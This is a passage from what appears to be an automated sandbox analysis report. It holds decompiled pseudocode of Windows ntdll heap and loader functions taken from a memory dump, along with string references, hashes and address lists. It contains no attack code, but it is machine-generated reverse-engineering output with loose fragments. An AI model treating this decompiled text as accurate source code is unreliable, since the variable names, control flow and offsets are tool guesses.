                                                                                                                          										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                                                                                          											__eflags = E009E7D50();
                                                                                                                          											if(__eflags != 0) {
                                                                                                                          												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                                          												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                                          											}
                                                                                                                          											E00A81411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									_t133 = 0x7ffe038a;
                                                                                                                          									_t105 =  *( *[fs:0x30] + 0x50);
                                                                                                                          									__eflags = _t105;
                                                                                                                          									if(_t105 != 0) {
                                                                                                                          										__eflags =  *_t105;
                                                                                                                          										if( *_t105 == 0) {
                                                                                                                          											goto L16;
                                                                                                                          										}
                                                                                                                          										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                                          										goto L17;
                                                                                                                          									} else {
                                                                                                                          										L16:
                                                                                                                          										_t106 = _t133;
                                                                                                                          										L17:
                                                                                                                          										__eflags =  *_t106;
                                                                                                                          										if( *_t106 != 0) {
                                                                                                                          											__eflags = E009E7D50();
                                                                                                                          											if(__eflags != 0) {
                                                                                                                          												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                                          												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                                          											}
                                                                                                                          											E00A81411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                                                                                          										}
                                                                                                                          										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                                                                                          										_t150[1] = _t75;
                                                                                                                          										goto L4;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L10:
                                                                                                                          							_t97 = _t132;
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						goto L4;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          Strings
                                                                                                                          • HEAP[%wZ]: , xrefs: 00A3A0AD
                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00A3A0CD
                                                                                                                          • HEAP: , xrefs: 00A3A0BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                          • API String ID: 0-1340214556
                                                                                                                          • Opcode ID: 75ddb737a088608c9fb625f4f93540500b38ddb0573b58f33a0cf56cad02e0bf
                                                                                                                          • Instruction ID: c82692b0698af904c92d97ff1615411edfd6e9ac9e19febf8584f2019d0f4482
                                                                                                                          • Opcode Fuzzy Hash: 75ddb737a088608c9fb625f4f93540500b38ddb0573b58f33a0cf56cad02e0bf
                                                                                                                          • Instruction Fuzzy Hash: 02812371204688EFD726CB68C985BBAB7F8FF05300F1445A5F69587692D378ED40CB12
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E009EB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				void* _t72;
                                                                                                                          				char _t76;
                                                                                                                          				signed char _t77;
                                                                                                                          				intOrPtr* _t80;
                                                                                                                          				unsigned int _t85;
                                                                                                                          				signed int* _t86;
                                                                                                                          				signed int _t88;
                                                                                                                          				signed char _t89;
                                                                                                                          				intOrPtr _t90;
                                                                                                                          				intOrPtr _t101;
                                                                                                                          				intOrPtr* _t111;
                                                                                                                          				void* _t117;
                                                                                                                          				intOrPtr* _t118;
                                                                                                                          				signed int _t120;
                                                                                                                          				signed char _t121;
                                                                                                                          				intOrPtr* _t123;
                                                                                                                          				signed int _t126;
                                                                                                                          				intOrPtr _t136;
                                                                                                                          				signed int _t139;
                                                                                                                          				void* _t140;
                                                                                                                          				signed int _t141;
                                                                                                                          				void* _t147;
                                                                                                                          
                                                                                                                          				_t111 = _a4;
                                                                                                                          				_t140 = __ecx;
                                                                                                                          				_v8 = __edx;
                                                                                                                          				_t3 = _t111 + 0x18; // 0x0
                                                                                                                          				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                                                                                          				_t5 = _t111 - 8; // -32
                                                                                                                          				_t141 = _t5;
                                                                                                                          				 *(_t111 + 0x14) = _a8;
                                                                                                                          				_t72 = 4;
                                                                                                                          				 *(_t141 + 2) = 1;
                                                                                                                          				 *_t141 = _t72;
                                                                                                                          				 *((char*)(_t141 + 7)) = 3;
                                                                                                                          				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                                                                                          				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                                                                                          					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                                                                                          					_v12 = _t76;
                                                                                                                          					__eflags = _t76 - 0xfe;
                                                                                                                          					if(_t76 >= 0xfe) {
                                                                                                                          						_push(__edx);
                                                                                                                          						_push(0);
                                                                                                                          						E00A8A80D(_t134, 3, _t141, __edx);
                                                                                                                          						_t76 = _v12;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t76 = 0;
                                                                                                                          				}
                                                                                                                          				 *((char*)(_t141 + 6)) = _t76;
                                                                                                                          				if( *0xab8748 >= 1) {
                                                                                                                          					__eflags = _a12 - _t141;
                                                                                                                          					if(_a12 <= _t141) {
                                                                                                                          						goto L4;
                                                                                                                          					}
                                                                                                                          					_t101 =  *[fs:0x30];
                                                                                                                          					__eflags =  *(_t101 + 0xc);
                                                                                                                          					if( *(_t101 + 0xc) == 0) {
                                                                                                                          						_push("HEAP: ");
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                                                                                          					E009CB150();
                                                                                                                          					__eflags =  *0xab7bc8;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						E00A82073(_t111, 1, _t140, __eflags);
                                                                                                                          					}
                                                                                                                          					goto L3;
                                                                                                                          				} else {
                                                                                                                          					L3:
                                                                                                                          					_t147 = _a12 - _t141;
                                                                                                                          					L4:
                                                                                                                          					if(_t147 != 0) {
                                                                                                                          						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                                                                                          						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                                                                                          						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                                                                                          					}
                                                                                                                          					_t135 =  *(_t111 + 0x14);
                                                                                                                          					if( *(_t111 + 0x14) == 0) {
                                                                                                                          						L12:
                                                                                                                          						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                                                                                          						if(_t77 != 0) {
                                                                                                                          							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                                          						} else {
                                                                                                                          							_t117 = _t140;
                                                                                                                          						}
                                                                                                                          						_t118 = _t117 + 0x38;
                                                                                                                          						_t26 = _t111 + 8; // -16
                                                                                                                          						_t80 = _t26;
                                                                                                                          						_t136 =  *_t118;
                                                                                                                          						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                                                                                          							_push(_t118);
                                                                                                                          							_push(0);
                                                                                                                          							E00A8A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                                                                                          						} else {
                                                                                                                          							 *_t80 = _t136;
                                                                                                                          							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                                                                                          							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                                                                                          							 *_t118 = _t80;
                                                                                                                          						}
                                                                                                                          						_t120 = _v8;
                                                                                                                          						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                                                                                          						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                                                                                          						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                                                                                          						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                                                                                          						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                                                                                          							__eflags =  *(_t140 + 0xb8);
                                                                                                                          							if( *(_t140 + 0xb8) == 0) {
                                                                                                                          								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                                                                                          								__eflags = _t88 - 2;
                                                                                                                          								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                                                                                          								__eflags =  *0xab8720 & 0x00000001;
                                                                                                                          								_t89 = _t88 & 0xffffff00 | ( *0xab8720 & 0x00000001) == 0x00000000;
                                                                                                                          								__eflags = _t89 & _t121;
                                                                                                                          								if((_t89 & _t121) != 0) {
                                                                                                                          									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t85 =  *(_t111 + 0x14);
                                                                                                                          						if(_t85 >= 0x7f000) {
                                                                                                                          							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                                                                                          						}
                                                                                                                          						_t86 = _a16;
                                                                                                                          						 *_t86 = _t141 - _a12 >> 3;
                                                                                                                          						return _t86;
                                                                                                                          					} else {
                                                                                                                          						_t90 = E009EB8E4(_t135);
                                                                                                                          						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                                                                                          						if( *_t123 != _t90) {
                                                                                                                          							_push(_t123);
                                                                                                                          							_push( *_t123);
                                                                                                                          							E00A8A80D(0, 0xd, _t90, 0);
                                                                                                                          						} else {
                                                                                                                          							 *_t111 = _t90;
                                                                                                                          							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                                                                                          							 *_t123 = _t111;
                                                                                                                          							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                                                                                          						}
                                                                                                                          						_t139 =  *(_t140 + 0xb8);
                                                                                                                          						if(_t139 != 0) {
                                                                                                                          							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                                                                                          							__eflags = _t93;
                                                                                                                          							while(1) {
                                                                                                                          								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                                                                                          								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t126 =  *_t139;
                                                                                                                          								__eflags = _t126;
                                                                                                                          								if(_t126 != 0) {
                                                                                                                          									_t139 = _t126;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                                                          								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							E009EE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                                                                                          						}
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}






























                                                                                                                          0x009eb7ed
                                                                                                                          0x009eb7ed
                                                                                                                          0x009eb7ed
                                                                                                                          0x009eb7ef
                                                                                                                          0x009eb7f2
                                                                                                                          0x009eb7f2
                                                                                                                          0x009eb7f5
                                                                                                                          0x009eb7fa
                                                                                                                          0x00a32c2d
                                                                                                                          0x00a32c2e
                                                                                                                          0x00a32c39
                                                                                                                          0x009eb800
                                                                                                                          0x009eb800
                                                                                                                          0x009eb802
                                                                                                                          0x009eb805
                                                                                                                          0x009eb808
                                                                                                                          0x009eb808
                                                                                                                          0x009eb80a
                                                                                                                          0x009eb80d
                                                                                                                          0x009eb816
                                                                                                                          0x009eb81c
                                                                                                                          0x009eb822
                                                                                                                          0x009eb82f
                                                                                                                          0x009eb88b
                                                                                                                          0x009eb892
                                                                                                                          0x009eb897
                                                                                                                          0x009eb899
                                                                                                                          0x009eb89b
                                                                                                                          0x009eb89e
                                                                                                                          0x009eb8a5
                                                                                                                          0x009eb8a8
                                                                                                                          0x009eb8aa
                                                                                                                          0x009eb8ac
                                                                                                                          0x009eb8ac
                                                                                                                          0x009eb8aa
                                                                                                                          0x009eb892
                                                                                                                          0x009eb831
                                                                                                                          0x009eb839
                                                                                                                          0x009eb83b
                                                                                                                          0x009eb83b
                                                                                                                          0x009eb844
                                                                                                                          0x009eb84b
                                                                                                                          0x009eb852
                                                                                                                          0x009eb7b8
                                                                                                                          0x009eb7ba
                                                                                                                          0x009eb7bf
                                                                                                                          0x009eb7c4
                                                                                                                          0x00a32c18
                                                                                                                          0x00a32c19
                                                                                                                          0x00a32c23
                                                                                                                          0x009eb7ca
                                                                                                                          0x009eb7ca
                                                                                                                          0x009eb7cc
                                                                                                                          0x009eb7cf
                                                                                                                          0x009eb7d1
                                                                                                                          0x009eb7d1
                                                                                                                          0x009eb7d4
                                                                                                                          0x009eb7dc
                                                                                                                          0x009eb8bb
                                                                                                                          0x009eb8bb
                                                                                                                          0x009eb8be
                                                                                                                          0x009eb8be
                                                                                                                          0x009eb8c1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009eb8c3
                                                                                                                          0x009eb8c5
                                                                                                                          0x009eb8c7
                                                                                                                          0x009eb8e0
                                                                                                                          0x00000000
                                                                                                                          0x009eb8e0
                                                                                                                          0x009eb8cc
                                                                                                                          0x009eb8cc
                                                                                                                          0x00000000
                                                                                                                          0x009eb8cc
                                                                                                                          0x009eb8d6
                                                                                                                          0x009eb8d6
                                                                                                                          0x00000000
                                                                                                                          0x009eb7dc
                                                                                                                          0x009eb7b6

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-1334570610
                                                                                                                          • Opcode ID: d6255171cc7416db0044d678f7ee30969839a690b16abb2a1a121455cb99cde2
                                                                                                                          • Instruction ID: 1d0760293c25e56039f1f89c3ce80183057f88fee0482cfd7970523145ca54b6
                                                                                                                          • Opcode Fuzzy Hash: d6255171cc7416db0044d678f7ee30969839a690b16abb2a1a121455cb99cde2
                                                                                                                          • Instruction Fuzzy Hash: 9961AF70600281DFDB1ADF29C485B6ABBE9FF44304F24856EE8498B752D735EC81CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E009D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                          				char _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				char _v24;
                                                                                                                          				signed int _t73;
                                                                                                                          				void* _t77;
                                                                                                                          				char* _t82;
                                                                                                                          				char* _t87;
                                                                                                                          				signed char* _t97;
                                                                                                                          				signed char _t102;
                                                                                                                          				intOrPtr _t107;
                                                                                                                          				signed char* _t108;
                                                                                                                          				intOrPtr _t112;
                                                                                                                          				intOrPtr _t124;
                                                                                                                          				intOrPtr _t125;
                                                                                                                          				intOrPtr _t126;
                                                                                                                          
                                                                                                                          				_t107 = __edx;
                                                                                                                          				_v12 = __ecx;
                                                                                                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                          				_t124 = 0;
                                                                                                                          				_v20 = __edx;
                                                                                                                          				if(E009DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                                                          					_t112 = _v8;
                                                                                                                          				} else {
                                                                                                                          					_t112 = 0;
                                                                                                                          					_v8 = 0;
                                                                                                                          				}
                                                                                                                          				if(_t112 != 0) {
                                                                                                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                                                          						_t124 = 0xc000007b;
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                                                          					 *(_t125 + 0x34) = _t73;
                                                                                                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                                                          						goto L3;
                                                                                                                          					}
                                                                                                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                                                          					_t124 = E009CC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                                                          					if(_t124 < 0) {
                                                                                                                          						goto L8;
                                                                                                                          					} else {
                                                                                                                          						goto L3;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					L3:
                                                                                                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                                                          						L8:
                                                                                                                          						return _t124;
                                                                                                                          					}
                                                                                                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                                                          							goto L5;
                                                                                                                          						}
                                                                                                                          						_t102 =  *0xab5780; // 0x0
                                                                                                                          						if((_t102 & 0x00000003) != 0) {
                                                                                                                          							E00A45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                                                          							_t102 =  *0xab5780; // 0x0
                                                                                                                          						}
                                                                                                                          						if((_t102 & 0x00000010) != 0) {
                                                                                                                          							asm("int3");
                                                                                                                          						}
                                                                                                                          						_t124 = 0xc0000428;
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					_t77 = _a4 - 0x40000003;
                                                                                                                          					if(_t77 == 0 || _t77 == 0x33) {
                                                                                                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                          						if(E009E7D50() != 0) {
                                                                                                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                          						} else {
                                                                                                                          							_t82 = 0x7ffe0384;
                                                                                                                          						}
                                                                                                                          						_t108 = 0x7ffe0385;
                                                                                                                          						if( *_t82 != 0) {
                                                                                                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                                          								if(E009E7D50() == 0) {
                                                                                                                          									_t97 = 0x7ffe0385;
                                                                                                                          								} else {
                                                                                                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                          								}
                                                                                                                          								if(( *_t97 & 0x00000020) != 0) {
                                                                                                                          									E00A47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_a4 != 0x40000003) {
                                                                                                                          							L14:
                                                                                                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                          							if(E009E7D50() != 0) {
                                                                                                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                          							} else {
                                                                                                                          								_t87 = 0x7ffe0384;
                                                                                                                          							}
                                                                                                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                                          								if(E009E7D50() != 0) {
                                                                                                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                          								}
                                                                                                                          								if(( *_t108 & 0x00000020) != 0) {
                                                                                                                          									E00A47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							goto L8;
                                                                                                                          						} else {
                                                                                                                          							_v16 = _t125 + 0x24;
                                                                                                                          							_t124 = E009FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                                                          							if(_t124 < 0) {
                                                                                                                          								E009CB1E1(_t124, 0x1490, 0, _v16);
                                                                                                                          								goto L8;
                                                                                                                          							}
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}





















                                                                                                                          Strings
                                                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 00A29891
                                                                                                                          • LdrpCompleteMapModule, xrefs: 00A29898
                                                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 00A298A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                          • API String ID: 0-1676968949
                                                                                                                          • Opcode ID: 22708f2e7b783c9828fe53caa928e0477d3431a9e5adb92bcd2dda0ee3d7fcfb
                                                                                                                          • Instruction ID: 45dbbdd640618db7e7eabf9638483dabaebd1671af75ce7519890fc647d7ed17
                                                                                                                          • Opcode Fuzzy Hash: 22708f2e7b783c9828fe53caa928e0477d3431a9e5adb92bcd2dda0ee3d7fcfb
                                                                                                                          • Instruction Fuzzy Hash: 02514531A487449BDB21CBACC944B2ABBE4EF41710F1446AAF8519B3F2E734ED40C7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 64%
                                                                                                                          			E00A723E3(signed int __ecx, unsigned int __edx) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				char _t43;
                                                                                                                          				signed short _t44;
                                                                                                                          				signed short _t48;
                                                                                                                          				signed char _t51;
                                                                                                                          				signed short _t52;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				signed short _t64;
                                                                                                                          				signed short _t66;
                                                                                                                          				intOrPtr _t69;
                                                                                                                          				signed short _t73;
                                                                                                                          				signed short _t76;
                                                                                                                          				signed short _t77;
                                                                                                                          				signed short _t79;
                                                                                                                          				void* _t83;
                                                                                                                          				signed int _t84;
                                                                                                                          				signed int _t85;
                                                                                                                          				signed char _t94;
                                                                                                                          				unsigned int _t99;
                                                                                                                          				unsigned int _t104;
                                                                                                                          				signed int _t108;
                                                                                                                          				void* _t110;
                                                                                                                          				void* _t111;
                                                                                                                          				unsigned int _t114;
                                                                                                                          
                                                                                                                          				_t84 = __ecx;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t114 = __edx;
                                                                                                                          				_t42 =  *((intOrPtr*)(__edx + 7));
                                                                                                                          				if(_t42 == 1) {
                                                                                                                          					L49:
                                                                                                                          					_t43 = 1;
                                                                                                                          					L50:
                                                                                                                          					return _t43;
                                                                                                                          				}
                                                                                                                          				if(_t42 != 4) {
                                                                                                                          					if(_t42 >= 0) {
                                                                                                                          						if( *(__ecx + 0x4c) == 0) {
                                                                                                                          							_t44 =  *__edx & 0x0000ffff;
                                                                                                                          						} else {
                                                                                                                          							_t73 =  *__edx;
                                                                                                                          							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                                                                                          								_t73 = _t73 ^  *(__ecx + 0x50);
                                                                                                                          							}
                                                                                                                          							_t44 = _t73 & 0x0000ffff;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xab874c ^ __ecx;
                                                                                                                          						if(_t104 == 0) {
                                                                                                                          							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                                                                                          						} else {
                                                                                                                          							_t76 = 0;
                                                                                                                          						}
                                                                                                                          						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                                                                                          					}
                                                                                                                          					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                                                                                          					_t108 = _t44 & 0xffff;
                                                                                                                          					if(_t94 != 5) {
                                                                                                                          						if((_t94 & 0x00000040) == 0) {
                                                                                                                          							if((_t94 & 0x0000003f) == 0x3f) {
                                                                                                                          								if(_t94 >= 0) {
                                                                                                                          									if( *(_t84 + 0x4c) == 0) {
                                                                                                                          										_t48 =  *_t114 & 0x0000ffff;
                                                                                                                          									} else {
                                                                                                                          										_t66 =  *_t114;
                                                                                                                          										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                                                                                          											_t66 = _t66 ^  *(_t84 + 0x50);
                                                                                                                          										}
                                                                                                                          										_t48 = _t66 & 0x0000ffff;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xab874c ^ _t84;
                                                                                                                          									if(_t99 == 0) {
                                                                                                                          										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                                                                                          									} else {
                                                                                                                          										_t69 = 0;
                                                                                                                          									}
                                                                                                                          									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                                                                                          								}
                                                                                                                          								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                                                                                          							} else {
                                                                                                                          								_t85 = _t94 & 0x3f;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                                                                                          					}
                                                                                                                          					_t110 = (_t108 << 3) - _t85;
                                                                                                                          				} else {
                                                                                                                          					if( *(__ecx + 0x4c) == 0) {
                                                                                                                          						_t77 =  *__edx & 0x0000ffff;
                                                                                                                          					} else {
                                                                                                                          						_t79 =  *__edx;
                                                                                                                          						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                                                                                          							_t79 = _t79 ^  *(__ecx + 0x50);
                                                                                                                          						}
                                                                                                                          						_t77 = _t79 & 0x0000ffff;
                                                                                                                          					}
                                                                                                                          					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                                                                                          				}
                                                                                                                          				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                                                                                          				if(_t51 != 5) {
                                                                                                                          					if((_t51 & 0x00000040) == 0) {
                                                                                                                          						_t52 = 0;
                                                                                                                          						goto L42;
                                                                                                                          					}
                                                                                                                          					_t64 = _t51 & 0x3f;
                                                                                                                          					goto L38;
                                                                                                                          				} else {
                                                                                                                          					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                                                                                          					L38:
                                                                                                                          					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                                                                                          					L42:
                                                                                                                          					_t35 = _t114 + 8; // -16
                                                                                                                          					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                                                                                          					_t83 = _t35 + _t111;
                                                                                                                          					_t54 = E00A1D4F0(_t83, 0x9a6c58, 8);
                                                                                                                          					_v8 = _t54;
                                                                                                                          					if(_t54 == 8) {
                                                                                                                          						goto L49;
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push("HEAP: ");
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					_push(_t111);
                                                                                                                          					_push(_v8 + _t83);
                                                                                                                          					E009CB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                                                                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                          						 *0xab6378 = 1;
                                                                                                                          						asm("int3");
                                                                                                                          						 *0xab6378 = 0;
                                                                                                                          					}
                                                                                                                          					_t43 = 0;
                                                                                                                          					goto L50;
                                                                                                                          				}
                                                                                                                          			}





























                                                                                                                          Strings
                                                                                                                          • HEAP[%wZ]: , xrefs: 00A7254F
                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00A7256F
                                                                                                                          • HEAP: , xrefs: 00A7255C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                          • API String ID: 0-3815128232
                                                                                                                          • Opcode ID: a5625c4562ce0b7468ecfcf23a6f9e9fe7b058ecbfa490f7c620fa896da582b2
